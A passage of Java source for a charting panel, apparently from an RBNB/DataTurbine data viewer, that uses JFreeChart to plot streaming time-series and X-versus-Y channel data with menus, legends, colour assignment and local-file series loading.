      dataCollection = new XYTimeSeriesCollection();
      NumberAxis domainAxis = new NumberAxis();
      domainAxis.setAutoRangeIncludesZero(false);
      domainAxis.addChangeListener(new AxisChangeListener() {
        public void axisChanged(AxisChangeEvent ace) {
          boundsChanged();
        }
      });
      this.domainAxis = domainAxis;
      toolTipGenerator = new StandardXYToolTipGenerator("{0}: {1} , {2}",
          new DecimalFormat(), new DecimalFormat());
    } else {
      dataCollection = new TimeSeriesCollection();
      domainAxis = new FixedAutoAdjustRangeDateAxis();
      domainAxis.setLabel("Time");
      domainAxis.setAutoRange(false);
      toolTipGenerator = new StandardXYToolTipGenerator("{0}: {1} , {2}",
          new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS"), new DecimalFormat());
    }

    rangeAxis = new NumberAxis();
    rangeAxis.setAutoRangeIncludesZero(false);
    rangeAxis.addChangeListener(new AxisChangeListener() {
      public void axisChanged(AxisChangeEvent ace) {
        boundsChanged();
      }
    });

    FastXYItemRenderer renderer = new FastXYItemRenderer(StandardXYItemRenderer.LINES, toolTipGenerator);
    //SamplingXYLineRenderer renderer = new SamplingXYLineRenderer();
    //renderer.setToolTipGenerator(toolTipGenerator);
    //renderer.setShapeSize(0);
    renderer.setBaseCreateEntities(false);
    renderer.setBaseStroke(new BasicStroke(0.5f));
    Rectangle rect = new Rectangle(0, 0, 5, 5);
    renderer.setLegendLine(rect);
    if (xyMode) {
      renderer.setCursorVisible(true);
    }

    xyPlot = new XYPlot(dataCollection, domainAxis, rangeAxis, renderer);

    chart = new JFreeChart(xyPlot);
    chart.setAntiAlias(false);
    //chart.setAntiAlias(true);
    seriesLegend = chart.getLegend();
    chart.removeLegend();

    chartPanel = new ChartPanel(chart, true, this);
    chartPanel.setInitialDelay(0);

    chartPanelPanel = new JPanel();
    chartPanelPanel.setLayout(new BorderLayout());
    chartPanelPanel.add(chartPanel, BorderLayout.CENTER);
  }

  @Override
  public void buildPopupMenu(JPopupMenu menu, MouseEvent e) {
    super.buildPopupMenu(menu, e);

    ActionListener setTimerangeAction = new ActionListener() {
      public void actionPerformed(ActionEvent ae) {
        double newScale = Double.parseDouble(ae.getActionCommand());
        setLocalTimescale(newScale);
      }
    };

    // regenerate new menu
    JMenu timeRangeMenu = new JMenu("Set Timerange");
    ButtonGroup timeRangeGroup = new ButtonGroup();
    JRadioButtonMenuItem range = new JRadioButtonMenuItem(TimeScale.TIME_SCALE_UNDEFINED_DESC);
    range.setActionCommand(String.valueOf(TimeScale.TIME_SCALE_UNDEFINED));
    range.addActionListener(setTimerangeAction);
    timeRangeGroup.add(range);
    timeRangeMenu.add(range);
    if (localTimeScale_ == TimeScale.TIME_SCALE_UNDEFINED) range.setSelected(true);

    Double timeScales[] = TimeScale.getGlobalTimeScales();
    for (int i = 0; i < timeScales.length; i++) {
      range = new JRadioButtonMenuItem(DataViewer.formatSeconds(timeScales[i]));
      range.setActionCommand(String.valueOf(timeScales[i]));
      range.addActionListener(setTimerangeAction);
      timeRangeGroup.add(range);
      timeRangeMenu.add(range);
      if (localTimeScale_ == timeScales[i]) range.setSelected(true);
    }
    menu.add(timeRangeMenu);

    // create a popup menu item to copy an image to the clipboard
    final JMenuItem copyChartMenuItem = new JMenuItem("Copy");
    copyChartMenuItem.addActionListener(new ActionListener() {
      public void actionPerformed(ActionEvent arg0) {
        copyChart();
      }
    });
    menu.add(copyChartMenuItem);

    //menu.insert(new JPopupMenu.Separator(), 3);
    menu.add(new JPopupMenu.Separator());

    // Clear Data from the chart - Thomas Marullo 9/24/09
    final JMenuItem clearChartMenuItem = new JMenuItem("Clear Data");
    clearChartMenuItem.addActionListener(new ActionListener() {
      public void actionPerformed(ActionEvent arg0) {
        SwingUtilities.invokeLater(new Runnable() {
          public void run() {
            clearData();
          }
        });
      }
    });
    menu.add(clearChartMenuItem, 2);
    // End Clear Data

    JMenuItem showLegendMenuItem = new JCheckBoxMenuItem("Show Legend", showLegend);
    showLegendMenuItem.addActionListener(new ActionListener() {
      public void actionPerformed(ActionEvent ae) {
        setShowLegend(!showLegend);
      }
    });
    menu.add(showLegendMenuItem);

    if (xyMode) {
      menu.add(new JPopupMenu.Separator());
      JMenuItem addLocalSeriesMenuItem = new JMenuItem("Add local series...");
      addLocalSeriesMenuItem.addActionListener(new ActionListener() {
        public void actionPerformed(ActionEvent ae) {
          addLocalSeries();
        }
      });
      menu.add(addLocalSeriesMenuItem);
    }

    chartPanel.buildPopupMenu(menu, e);
  }

  /**
   * Takes the chart and puts it on the clipboard as an image.
   */
  private void copyChart() {
    // get the system clipboard
    Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();

    // create an image of the chart with the preferred dimensions
    Dimension preferredDimension = chartPanel.getPreferredSize();
    Image image = chart.createBufferedImage((int) preferredDimension.getWidth(), (int) preferredDimension.getHeight());

    // wrap image in the transferable and put on the clipboard
    ImageSelection contents = new ImageSelection(image);
    clipboard.setContents(contents, null);
  }

  /**
   * Add data from a local file as a series to this chart. This will ask the
   * user for the file name, and which channels to use.
   */
  private void addLocalSeries() {
    File file = UIUtilities.openFile();
    if (file == null || !file.isFile() || !file.exists()) {
      return;
    }

    DataFileReader reader;
    try {
      reader = new DataFileReader(file);
    } catch (IOException e) {
      JOptionPane.showMessageDialog(getDataComponent(), e.getMessage(),
          "Problem reading data file", JOptionPane.ERROR_MESSAGE);
      return;
    }

    List<Channel> channels = reader.getChannels();
    if (channels.size() < 2) {
      JOptionPane.showMessageDialog(getDataComponent(),
          "There must be at least 2 channels in the data file",
          "Problem with data file", JOptionPane.ERROR_MESSAGE);
      return;
    }

    Channel xChannel;
    Channel yChannel;

    if (channels.size() == 2) {
      xChannel = channels.get(0);
      yChannel = channels.get(1);
    } else {
      xChannel = (Channel) JOptionPane.showInputDialog(
          getDataComponent(),
          "Select the x channel:",
          "Add local channel",
          JOptionPane.PLAIN_MESSAGE,
          null,
          channels.toArray(),
          null);
      if (xChannel == null) {
        return;
      }
      yChannel = (Channel) JOptionPane.showInputDialog(
          getDataComponent(),
          "Select the y channel:",
          "Add local channel",
          JOptionPane.PLAIN_MESSAGE,
          null,
          channels.toArray(),
          null);
      if (yChannel == null) {
        return;
      }
    }

    String xChannelName = xChannel.getName();
    if (xChannel.getUnit() != null) {
      xChannelName += " (" + xChannel.getUnit() + ")";
    }
    int xChannelIndex = channels.indexOf(xChannel);

    String yChannelName = yChannel.getName();
    if (yChannel.getUnit() != null) {
      yChannelName += " (" + yChannel.getUnit() + ")";
    }
    int yChannelIndex = channels.indexOf(yChannel);

    String seriesName = xChannelName + " vs. " + yChannelName;

    XYTimeSeries data = new XYTimeSeries(seriesName, FixedMillisecond.class);
    try {
      NumericDataSample sample;
      while ((sample = reader.readSample()) != null) {
        double timestamp = sample.getTimestamp();
        Number[] values = sample.getValues();

        FixedMillisecond time = new FixedMillisecond((long) (timestamp * 1000));
        XYTimeSeriesDataItem dataItem = new XYTimeSeriesDataItem(time);
        if (values[xChannelIndex] != null && values[yChannelIndex] != null) {
          dataItem.setX(values[xChannelIndex]);
          dataItem.setY(values[yChannelIndex]);
        }
        data.add(dataItem, false);
      }
    } catch (Exception e) {
      e.printStackTrace();
      return;
    }

    Color color = getLeastUsedColor();
    colors.put(seriesName, color);

    ((XYTimeSeriesCollection) dataCollection).addSeries(data);
    localSeries++;

    setSeriesColors();
    updateTitle();
    updateLegend();
  }

  /**
   * Remove the local series from the chart.
   *
   * @param seriesName the name of the local series.
   */
  private void removeLocalSeries(String seriesName) {
    XYTimeSeries series = ((XYTimeSeriesCollection) dataCollection).getSeries(seriesName);
    if (series == null) {
      return;
    }

    localSeries--;
    ((XYTimeSeriesCollection) dataCollection).removeSeries(series);

    colors.remove(seriesName);
    setSeriesColors();

    updateTitle();
    updateLegend();
  }

  /**
   * Called when the bounds of an axis are changed. This updates the data panel
   * properties for these values.
   */
  private void boundsChanged() {
    if (xyMode) {
      if (domainAxis.isAutoRange()) {
        properties.remove("domainLowerBound");
        properties.remove("domainUpperBound");
      } else {
        log.debug("setting domain bound to lower:" + domainAxis.getLowerBound() +
            " upper:" + domainAxis.getUpperBound());
        properties.setProperty("domainLowerBound", Double.toString(domainAxis.getLowerBound()));
        properties.setProperty("domainUpperBound", Double.toString(domainAxis.getUpperBound()));
      }
    }

    if (rangeAxis.isAutoRange()) {
      log.debug("range is auto - lower:" + rangeAxis.getLowerBound() +
          " upper:" + rangeAxis.getUpperBound());
      properties.remove("rangeLowerBound");
      properties.remove("rangeUpperBound");
    } else {
      log.debug("setting range bound to lower:" + rangeAxis.getLowerBound() +
          " upper:" + rangeAxis.getUpperBound());
      properties.setProperty("rangeLowerBound", Double.toString(rangeAxis.getLowerBound()));
      properties.setProperty("rangeUpperBound", Double.toString(rangeAxis.getUpperBound()));
    }
  }

  /**
   * Indicates that this data panel can support multiple channels. This always
   * returns true.
   *
   * @return always true
   */
  public boolean supportsMultipleChannels() {
    return true;
  }

  protected VisualizationSeries getSeriesForChannel(String channelName) {
    if (xyMode) {
      return new XYChannelSeries(channelName);
    } else {
      return super.getSeriesForChannel(channelName);
    }
  }

  protected void onSeriesAdded(VisualizationSeries vs) {
//    String channelDisplay = getChannelDisplay(channelName);
//    String seriesName = null;
    Color color = getLeastUsedColor();
    if (xyMode) {
//      Iterator<String> chanIt = vs.getChannels().iterator();
//      String firstChannelName = (String) chanIt.next();
//      String firstChannelDisplay = getChannelDisplay(firstChannelName);
//      seriesName = firstChannelDisplay + " vs. 
" + channelDisplay; // //color = getLeastUsedColor(); XYTimeSeries data = new XYTimeSeries(vs.getName(), FixedMillisecond.class); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); int position = dataCollection.getSeriesCount() - localSeries; ((XYTimeSeriesCollection)dataCollection).addSeries(position, data); } else { //seriesName = channelDisplay; FastTimeSeries data = new FastTimeSeries(vs.getName(), FixedMillisecond.class); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); ((TimeSeriesCollection)dataCollection).addSeries(data); } // find the least used color and set it colors.put(vs.getName(), color); setSeriesColors(); updateLegend(); System.out.println("adding series "+vs.getName()); } /** * Called when a channel has been added. * * @param channelName the new channel */ // protected void channelAdded(String channelName) { // // updateTitle(); // // } /** * Update legend and color allocations. * @param vs the series that was removed. */ protected void onSeriesRemoved(VisualizationSeries vs) { setSeriesColors(); //updateTitle(); updateLegend(); } /** * Return a color that is least used. * * @return the color */ private Color getLeastUsedColor() { int usage = -1; Color color = null; for (int i=0; i<seriesColors.length; i++) { int seriesUsingColor = getSeriesUsingColor(seriesColors[i]); if (usage == -1 || seriesUsingColor < usage) { usage = seriesUsingColor; color = seriesColors[i]; } } return color; } /** * Count the number of series using the specified color for their series * plot. * * @param color the color to find * @return the number of series using this color */ private int getSeriesUsingColor(Color color) { if (color == null) { return 0; } int count = 0; for (int i=0; i<dataCollection.getSeriesCount(); i++) { Paint p = xyPlot.getRenderer().getSeriesPaint(i); if (p.equals(color)) { count++; } } return count; } /** * Set the color for all the series. */ private void setSeriesColors() { for (int i=0; i<dataCollection.getSeriesCount(); i++) { String series = (String)dataCollection.getSeriesKey(i); xyPlot.getRenderer().setSeriesPaint(i, colors.get(series)); } } /** * Set local time scale. */ protected void setLocalTimescale(double timeScale) { super.setLocalTimescale(timeScale); ageDataOnTimeScaleChange(); } /** * Shows or hides the legend. * * @param showLegend if true, the legend will show, otherwise it will not */ private void setShowLegend(boolean showLegend) { if (this.showLegend == showLegend) { return; } this.showLegend = showLegend; //showLegendMenuItem.setSelected(showLegend); if (showLegend) { properties.remove(DATA_PANEL_PROPERTY_SHOW_LEGEND); } else { properties.setProperty(DATA_PANEL_PROPERTY_SHOW_LEGEND, "false"); } updateLegend(); } /** * Update the legend and axis labels based on the series being viewed. 
*/ private void updateLegend() { int series = dataCollection.getSeriesCount(); //int chans = channels.size(); VisualizationSeries firstSeries = null; if(seriesList_.size()>0){ firstSeries = seriesList_.get(0); } if (xyMode) { if(firstSeries==null){ domainAxis.setLabel(null); rangeAxis.setLabel(null); }else{ String channelDisplay = getChannelDisplay(firstSeries.getChannels().get(0)); domainAxis.setLabel(channelDisplay); if(firstSeries.getChannels().size()>1){ String channel2 = firstSeries.getChannels().get(1); rangeAxis.setLabel(getChannelDisplay(channel2)); }else{ rangeAxis.setLabel(null); } } // if (series == 0 && chans == 1) { // String channelDisplay = getChannelDisplay((String)channels.get(0)); // domainAxis.setLabel(channelDisplay); // rangeAxis.setLabel(null); // } else if (series == 1 && chans == 0) { // XYTimeSeries xySeries = ((XYTimeSeriesCollection)dataCollection).getSeries(0); // String seriesName = (String)xySeries.getKey(); // String[] channelNames = seriesName.split(" vs. "); // if (channelNames.length == 2) { // domainAxis.setLabel(channelNames[0]); // rangeAxis.setLabel(channelNames[1]); // } // } else if (series == 1 && chans == 2) { // String channelDisplay1 = getChannelDisplay((String)channels.get(0)); // domainAxis.setLabel(channelDisplay1); // String channelDisplay2 = getChannelDisplay((String)channels.get(1)); // rangeAxis.setLabel(channelDisplay2); // } } else { if(firstSeries==null){ rangeAxis.setLabel(null); }else{ String channelDisplay = getChannelDisplay(firstSeries.getChannels().get(0)); rangeAxis.setLabel(channelDisplay); } } // show the legend if it is enabled and there are at least 2 series if (showLegend && series >= 2) { if (chart.getLegend() == null) { chart.addLegend(seriesLegend); } } else { if (chart.getLegend() != null) { seriesLegend = chart.getLegend(); } chart.removeLegend(); } } // @Override // public VizSeriesList getSeries(){ // // if (xyMode) { // VizSeriesList ret = new VizSeriesList(); // Iterator<String> i = channels.iterator(); // while (i.hasNext()) { // String firstChannel = i.next(); // if (i.hasNext()) { // String secondChannel = i.next(); // List<String> channels=new ArrayList<String>(); // channels.add(firstChannel); // channels.add(secondChannel); // ChannelSeries newSeries=new ChannelSeries(channels, new XYSeriesFormatter()); // ret.add(newSeries); // }else{ // ChannelSeries newSeries=new ChannelSeries(firstChannel, new XYSeriesFormatter()); // ret.add(newSeries); // } // } // // // add opaque series with just name placeholder??? 
// int remoteSeries = dataCollection.getSeriesCount()-localSeries; // for (int j=remoteSeries; j<remoteSeries+localSeries; j++) { // String seriesName = (String)dataCollection.getSeriesKey(j); // new ChartLocalSeries(seriesName); // } // return ret; // }else{ // return super.getSeries(); // } // } @Override public boolean removeSeries(String seriesName){ boolean ret=true; VizSeriesList slist = getSeries(); for(int i=0;i<slist.size();i++){ VisualizationSeries series=slist.get(i); if(series.getName().compareToIgnoreCase(seriesName)==0){ if(series instanceof ChartLocalSeries){ removeLocalSeries(series.getName()); }else{ if (xyMode) { XYTimeSeriesCollection dataCollection = (XYTimeSeriesCollection)this.dataCollection; XYTimeSeries data = dataCollection.getSeries(series.getName()); dataCollection.removeSeries(data); colors.remove(series.getName()); ret= super.removeSeries(series); } else { TimeSeriesCollection dataCollection = (TimeSeriesCollection)this.dataCollection; TimeSeries data = dataCollection.getSeries(series.getName()); if(data!=null){ dataCollection.removeSeries(data); } colors.remove(series.getName()); ret= super.removeSeries(series); } } } } setSeriesColors(); updateTitle(); updateLegend(); return ret; } /** * Get the string for this channel to display in the UI. This will show the * channel units if there are any. * * @param channelName the name of the channel * @return the string to display the channel in the UI */ private String getChannelDisplay(String channelName) { String seriesName = channelName; Channel channel = RBNBController.getInstance().getChannel(channelName); if (channel != null) { String unit = channel.getUnit(); if (unit != null) { seriesName += " (" + unit + ")"; } } return seriesName; } /** * Called when the global time scale changes. This updates the maximum age of the * dataset. * * @param newTimeScale the new time scale */ public void globalTimeScaleChanged(double timeScale) { super.globalTimeScaleChanged(timeScale); if(localTimeScale_==TimeScale.TIME_SCALE_UNDEFINED){ ageDataOnTimeScaleChange(); } } private void ageDataOnTimeScaleChange(){ SwingUtilities.invokeLater(new Runnable() { final double localScale = localTimeScale_; public void run() { // /* update UI to reflect changing timescale */ // Enumeration<AbstractButton> iter = timeRangeGroup.getElements(); // while (timeRangeGroup.getElements().hasMoreElements()) { // AbstractButton b = iter.nextElement(); // double btnValue = Double.parseDouble(b.getActionCommand()); // if(localScale==btnValue){ // timeRangeGroup.setSelected(b.getModel(), true); // break; // } // } int series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { if (xyMode) { XYTimeSeriesCollection xyTimeSeriesCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesCollection.getSeries(i); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); } else { TimeSeriesCollection timeSeriesCollection = (TimeSeriesCollection)dataCollection; FastTimeSeries data = (FastTimeSeries)timeSeriesCollection.getSeries(i); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); } } if (!xyMode) { domainAxis.setRange((time-timeScale)*1000, time*1000); ((FixedAutoAdjustRangeDateAxis)domainAxis).setAutoAdjustRange((time-timeScale)*1000, time*1000); } } }); } /** * Posts new data to the data panel. 
* * @param channelMap the channel map with the new data */ public void postData(final SubscriptionResponse r){ if(r==null) return; final double now =RBNBController.getInstance().getLocation(); this.time=now; lastDataPostSysTime=System.currentTimeMillis(); Runnable run = new Runnable() { //private double time=ChartViz.this.time; private SubscriptionResponse resp=r; //SubscriptionResponse resp=r; public void run() { //ChartViz.this.subResponse_=resp; if(r.containsHistory()){ //log.debug("received "+DataViewer.formatDate(time)+" before "+DataViewer.formatDate(this.time)); clearData(); } // must set time axis before adding data to ensure // auto ranging is properly calculated setTimeAxis(now); if (xyMode) { postDataXY(resp); } else { postDataTimeSeries(resp); } //resp.getTimeSeries().free(ChartViz.this); //if(resp.freeResult(ChartViz.this)){ //ChartViz.this.subResponse_=null; //} } }; SwingUtilities.invokeLater(run); } /** * Posts the data in the channel map when in time series mode. * * @param resp the response with the new data */ private void postDataTimeSeries(SubscriptionResponse resp) { postDataCount=0L; postDataStartTime=Double.MAX_VALUE; postDataEndTime=0.0; long startTimeMillis=System.currentTimeMillis(); chart.setNotify(false); VizSeriesList vsl = getSeries(); //loop over all channels and see if there is data for them for (VisualizationSeries s : vsl) { TimeSeriesData tsd = resp.getTimeSeries(s); if (tsd == null) continue; //if there is data for channel, post it //if(tsd.hasChannel(channelName)){ postDataTimeSeries(tsd, s); //} } log.debug("copied "+postDataCount+" series recs from: " +RBNBTime.formatISO(postDataStartTime)+" to: " +RBNBTime.formatISO(postDataEndTime)+" in " +(System.currentTimeMillis()-startTimeMillis) +" ms"); startTimeMillis=System.currentTimeMillis(); chart.setNotify(true); chart.fireChartChanged(); // always return 0 //log.info("rendered plot in " // +(System.currentTimeMillis()-startTimeMillis) // +" ms"); } /** * Posts the data in the channel map to the specified channel when in time * series mode. 
* * @param channelMap the channel map containing the new data * @param channelName the name of the channel to post data to */ private void postDataTimeSeries(TimeSeriesData tsd, VisualizationSeries s) { String channelName = s.getChannels().get(0); if(!tsd.hasChannel(channelName)) return; TimeSeriesCollection dataCollection = (TimeSeriesCollection)this.dataCollection; FastTimeSeries timeSeriesData = (FastTimeSeries)dataCollection.getSeries(channelName); if (timeSeriesData == null) { log.warn("No chartviz data series with channel name "+channelName); return; } //TimeSeriesData respTs=resp.getTimeSeries(); try { //double[] times = channelMap.GetTimes(channelIndex); int channelIndex=tsd.getChannelIndex(channelName); if(channelIndex<0){ //log.debug("time series got null iterator for channel "+channelName); }else{ List<Double> times=tsd.getTimes(channelIndex); Iterator<Double>it=times.iterator(); int typeID = tsd.getType(channelIndex); //chart.setNotify(false); timeSeriesData.startAdd(times.size()); while (it.hasNext()){ Double newTime=it.next(); RBNBTime recTime=new RBNBTime(newTime); FixedMillisecond time = new FixedMillisecond(recTime.getMillis()); switch (typeID) { case ChannelMap.TYPE_FLOAT64: timeSeriesData.add(time, tsd.getDataAsFloat64(channelIndex,newTime)); break; case ChannelMap.TYPE_FLOAT32: timeSeriesData.add(time, tsd.getDataAsFloat32(channelIndex,newTime)); break; case ChannelMap.TYPE_INT64: timeSeriesData.add(time, tsd.getDataAsInt64(channelIndex,newTime)); break; case ChannelMap.TYPE_INT32: timeSeriesData.add(time, tsd.getDataAsInt32(channelIndex,newTime)); break; case ChannelMap.TYPE_INT16: timeSeriesData.add(time, tsd.getDataAsInt16(channelIndex,newTime)); break; case ChannelMap.TYPE_INT8: timeSeriesData.add(time, tsd.getDataAsInt8(channelIndex,newTime)); break; case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: case ChannelMap.TYPE_BYTEARRAY: log.error("Got byte array type for channel " + channelName + ". Don't know how to handle."); break; } ++postDataCount; } if(times.size()>0){ if(times.get(0)<postDataStartTime) postDataStartTime=times.get(0); if(times.get(times.size()-1)>postDataEndTime) postDataEndTime=times.get(times.size()-1); } } timeSeriesData.fireSeriesChanged(); //chart.setNotify(true); //chart.fireChartChanged(); } catch (Exception e) { log.error("Problem plotting data for channel " + channelName + "."); e.printStackTrace(); } } /** * Posts a new time with no data. Updates time scale of graph if * no data has been posted to this chart within the fixed timeout. * This was added for the case where we are monitoring data and * only receiving from some sources. Plots dependent on sources * not providing data should still adjust to show time passing. * * @param time the new time */ public void postTime(double time) { if ((time>this.time) && (System.currentTimeMillis()-lastDataPostSysTime) >(ADJUST_TIME_SCALE_TIMEOUT_SEC*1000.0)){ log.debug("adjusting chart axis on postTime()"); super.postTime(time); final double myTime = time; SwingUtilities.invokeLater(new Runnable() { public void run(){ setTimeAxis(myTime); } }); } } /** * Posts the data in the channel map when in x vs. y mode. 
* * @param resp new data response * @param cachedChannelMap the cached channel map */ private void postDataXY(SubscriptionResponse resp) { postDataCount=0L; postDataStartTime=Double.MAX_VALUE; postDataEndTime=0.0; VizSeriesList vsl = getSeries(); long startTimeMillis=System.currentTimeMillis(); chart.setNotify(false); for (int i=0;i<vsl.size();i++){ VisualizationSeries s=vsl.get(i); postDataXY(resp.getTimeSeries(s),s,i); } // //loop over all channels and see if there is data for them // int seriesCount = dataCollection.getSeriesCount()-localSeries; // // chart.setNotify(false); // // for (int i=0; i<seriesCount; i++) { // postDataXY(resp, i); // } log.debug("copied "+postDataCount+" xy recs from: " +RBNBTime.formatISO(postDataStartTime)+" to: " +RBNBTime.formatISO(postDataEndTime)+" in " +(System.currentTimeMillis()-startTimeMillis) +" ms"); startTimeMillis=System.currentTimeMillis(); chart.setNotify(true); //xySeriesData.fireSeriesChanged(); chart.fireChartChanged(); //lastTimeDisplayed = time; // always returns 0 //log.info("rendered plot in " // +(System.currentTimeMillis()-startTimeMillis) // +" ms"); } /** * Posts the data in the channel map to the specified channel when in x vs. y * mode. * * @param tsd new data response * @param series data series * @param seriesIndex the index of the series */ private void postDataXY(TimeSeriesData tsd, VisualizationSeries series, int seriesIndex) { if (!xyMode) { log.error("Tried to post X vs. Y data when not in xy mode."); return; } // if (resp == null) { // log.debug("postXY channel map null"); // //no data to display yet // return; // } // TimeSeriesData tsData=resp.getTimeSeries(); if (tsd==null || !tsd.hasData()) { log.debug("postXY no data to graph"); //no data to display yet return; } //System.out.print("series:"+series+", chans:"); //for(String chanName: channels){ // System.out.print(chanName+","); //} //log.debug(); // not enuff channels in series yet if(series.getChannels().size()<2) return; //Object[] channelsArray = channels.toArray(); String xChannelName = series.getChannels().get(0);//(String)channelsArray[series*2]; String yChannelName = series.getChannels().get(1);//(String)channelsArray[series*2+1]; //get the channel indexes for the x and y channels int xChannelIndex = tsd.getChannelIndex(xChannelName); int yChannelIndex = tsd.getChannelIndex(yChannelName); if(xChannelIndex<0 || yChannelIndex<0) { log.warn("postXY channels not found in time series - post data cancelled"); return; } List<Double> xTimes=tsd.getTimes(xChannelIndex); List<Double> yTimes=tsd.getTimes(yChannelIndex); if(xTimes.size()==0 || yTimes.size()==0){ log.warn("postXY channels have no time series data - post data cancelled"); return; } boolean xIsDriver=false; List<Double> driverTimes; if(xTimes.size()<yTimes.size()){ driverTimes=xTimes; xIsDriver=true; }else{ driverTimes=yTimes; } try { //log.debug("postXY graphing from "+DataViewer.formatDateSmart(dataStartTime)+" to "+DataViewer.formatDateSmart(times[endIndex])); XYTimeSeriesCollection dataCollection = (XYTimeSeriesCollection)this.dataCollection; XYTimeSeries xySeriesData = (XYTimeSeries)dataCollection.getSeries(seriesIndex); int yTypeID = tsd.getType(yChannelIndex); int xTypeID = tsd.getType(xChannelIndex); //chart.setNotify(false); // if(tsd.size(yChannelIndex) != tsd.size(xChannelIndex)){ // log.warn("xy chart data size mismatch!"); // } log.debug("start graphing "+(tsd.size(yChannelIndex)+" points on series "+series)); xySeriesData.startAdd(driverTimes.size()); //List<Double> 
yTimes=tsd.getTimes(yChannelIndex); Iterator<Double> drvTimeIt=driverTimes.iterator(); while (drvTimeIt.hasNext()){ Double drvTime=drvTimeIt.next(); //TimeSeriesRecord xRec=xIt.next(); //if(xRec.getTime()!=yRec.getTime()){ // log.warn("xy plot time out of sync!"); //} Double xTime,yTime; if(xIsDriver){ xTime=drvTime; yTime=tsd.getTimeNearest(yChannelIndex,xTime); }else{ yTime=drvTime; xTime=tsd.getTimeNearest(xChannelIndex,yTime); } //log.info("xt: "+DataViewer.formatDate(xTime)+", yt: "+DataViewer.formatDate(yTime)); if(xTime==null || yTime==null){ log.warn("postXY no time for one or more channels"); continue; } RBNBTime rbnbTime=new RBNBTime(drvTime); FixedMillisecond time=new FixedMillisecond(rbnbTime.getMillis()); Number xData=null,yData=null; switch (xTypeID) { case ChannelMap.TYPE_FLOAT64: xData = tsd.getDataAsFloat64(xChannelIndex,xTime); break; case ChannelMap.TYPE_FLOAT32: xData = tsd.getDataAsFloat32(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT64: xData = tsd.getDataAsInt64(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT32: xData = tsd.getDataAsInt32(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT16: xData = tsd.getDataAsInt16(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT8: xData = tsd.getDataAsInt8(xChannelIndex,xTime); break; case ChannelMap.TYPE_BYTEARRAY: case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: log.error("Don't know how to handle data type for " + xChannelName + "."); break; } switch (yTypeID) { case ChannelMap.TYPE_FLOAT64: yData = tsd.getDataAsFloat64(yChannelIndex,yTime); break; case ChannelMap.TYPE_FLOAT32: yData = tsd.getDataAsFloat32(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT64: yData = tsd.getDataAsInt64(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT32: yData = tsd.getDataAsInt32(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT16: yData = tsd.getDataAsInt16(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT8: yData = tsd.getDataAsInt8(yChannelIndex,yTime); break; case ChannelMap.TYPE_BYTEARRAY: case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: log.error("Don't know how to handle data type for " + yChannelName + "."); break; } //FIXME null is not a valid return value for the getData methods now // need some way to verify both data channels have data at same time // and perhaps provide a way to match closest data point if they don't if(xData!=null && yData !=null){ xySeriesData.add(time, xData, yData, false); ++postDataCount; }else{ log.warn("data not synced for plot x: "+xChannelName+" y: "+yChannelName+" at:"+rbnbTime.formatISO()); } } xySeriesData.fireSeriesChanged(); // // chart.setNotify(true); // //xySeriesData.fireSeriesChanged(); // chart.fireChartChanged(); if(driverTimes.size()>0){ if(driverTimes.get(0)<postDataStartTime) postDataStartTime=driverTimes.get(0); if(driverTimes.get(driverTimes.size()-1)>postDataEndTime) postDataEndTime=driverTimes.get(driverTimes.size()-1); } // if(driverTimes.size()>0){ // log.debug("xy chart graphed "+driverTimes.size()+" recs between "+ // RBNBTime.formatISO(driverTimes.get(0))+" and "+ // RBNBTime.formatISO(driverTimes.get(driverTimes.size()-1))); // }else{ // log.warn("xy chart graphed 0 recs"); // } } catch (Exception e) { log.error("Problem plotting data for channels " + xChannelName + " and " + yChannelName + "."); e.printStackTrace(); } } /** * Sets the time axis to display within the current time and time scale. This * assumes it is called in the event dispatch thread. 
*/ private void setTimeAxis(double end) { if (chart == null) { log.warn("Chart object is null. This shouldn't happen."); return; } //Object[] channelsArray = channels.toArray(); RBNBTime endTime=new RBNBTime(end); RBNBTime startTime=new RBNBTime(end-timeScale); //log.debug("time axis start: "+startTime.formatISO()+" end:"+endTime.formatISO()); int series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { // //FIXME access to channelsArray causes an array index error on AWT thread // String xChannelName = (String)channelsArray[i*2]; // String yChannelName = (String)channelsArray[i*2+1]; // int xIndex=resp.getTimeSeries().getChannelIndex(xChannelName); // int yIndex=resp.getTimeSeries().getChannelIndex(yChannelName); // //RBNBTime maxLast=new RBNBTime(Math.max(resp.getTimeSeries().getEndTime(xIndex), // resp.getTimeSeries().getEndTime(yIndex))); if (xyMode) { XYTimeSeriesCollection xyTimeSeriesDataCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesDataCollection.getSeries(i); //log.debug("aging graph items at "+endTime.formatISO()); data.removeAgedItems(endTime.getMillis()); } else { TimeSeriesCollection timeSeriesDataCollection = (TimeSeriesCollection)dataCollection; TimeSeries data = timeSeriesDataCollection.getSeries(i); //log.debug("aging graph items at "+endTime.formatISO()); data.removeAgedItems(endTime.getMillis(), true); } } if (!xyMode) { domainAxis.setRange(startTime.getMillis(), endTime.getMillis()); ((FixedAutoAdjustRangeDateAxis)domainAxis).setAutoAdjustRange(startTime.getMillis(), endTime.getMillis()); } } /** * Sets the time axis to display within the current time and time scale. This * assumes it is called in the event dispatch thread. */ // private void setTimeAxis(SubscriptionResponse resp) { // // TimeSeriesData tsd=resp.getTimeSeries(); // if(!tsd.hasData())return; // setTimeAxis(tsd.getMaxEndTime()); // } /** * Removes all data from all the series. */ void clearData() { if (chart == null) return; //lastTimeDisplayed = -1; int 